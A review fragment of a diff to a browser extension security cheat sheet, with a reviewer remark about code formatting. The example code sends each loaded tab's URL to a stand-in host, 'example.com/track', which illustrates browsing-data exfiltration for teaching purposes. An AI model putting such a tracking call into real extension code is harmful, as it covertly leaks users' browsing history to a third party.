cheatsheets/Browser_Extension_Vulnerabilities_Cheat_Sheet.md

```diff
@@ -38,7 +38,7 @@ chrome.tabs.onUpdated.addListener((tabId, changeInfo, tab) => {
   if (changeInfo.status === 'complete') {
     fetch('http://example.com/track', {
       method: 'POST',
-      body: JSON.stringify({ url: tab.url })
+      body: JSON.stringify({ URL: tab.url })
```

Comment:
The reason this is being flagged is that it's not in a code element. See https://docs.github.com/en/get-started/writing-on-github/getting-started-with-writing-and-formatting-on-github/basic-writing-and-formatting-syntax#quoting-code